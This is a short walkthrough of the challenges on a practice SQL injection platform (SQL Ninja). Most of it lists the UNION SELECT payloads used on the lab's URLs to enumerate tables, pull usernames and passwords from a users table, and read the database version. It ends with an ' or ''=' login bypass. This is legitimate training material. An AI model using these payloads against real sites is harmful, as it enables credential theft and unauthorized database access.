Welcome to pure practical tutorial in which you have to do everything by yourself and if you get into any problem you can take a hint from here. This is only for Knowledge purpose. Don’t use it for malicious things. This contains lessons on SQL Ninja platform.
Challenge 1 for injecting a code
Code used: http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1’+union+select+1,’injected by siddhantshcbisd sdjkchsivkjnsv sdkjvbsdkjsd vsdkjvbkjsdvbsd skdjvbkjsdvnsd dskjbvkjdsvns sdkjvbskdjvbsdk kjsdbvkjsdbvkjsd dkjbvkdsjbvccqeb’,3– –
Challenge 2: For injecting a code
Code used: +union+select+1,’u r hacker’,3,4— –
Challenge to find the tables
Code used http://leettime.net/sqlninja.com/tasks/basic_ch2.php?id=1%20union%20select %201,table_name,3,4%20from%20information_schema.tables%20where %20table_schema=database()–
Challenge to enter in the table
code used: union select * from table_name (userlogs)
Challenge to open the full database
Code used http://leettime.net/sqlninja.com/tasks/basic_ch2.php?id=1%20union%20select%201,table_name,3,4%20from%20information_schema.tables
Challenge to get the admin usernames
Code used http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1%27+UNION+SELECT+1,username,3%20from%20users–
Challenge to get admin passwords
code used http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1%27+UNION+SELECT+1,password,@@version%20from%20users–
Final challenge to get admin login
One way is that we can login from the upper username and passwords which we got for admin access.
Username = Username : ‘ or ”=’ password = Password : ‘ or ”=’
I had made images little blur because this is only for the idea and other you have to do it yourself because this is pure practical tutorial.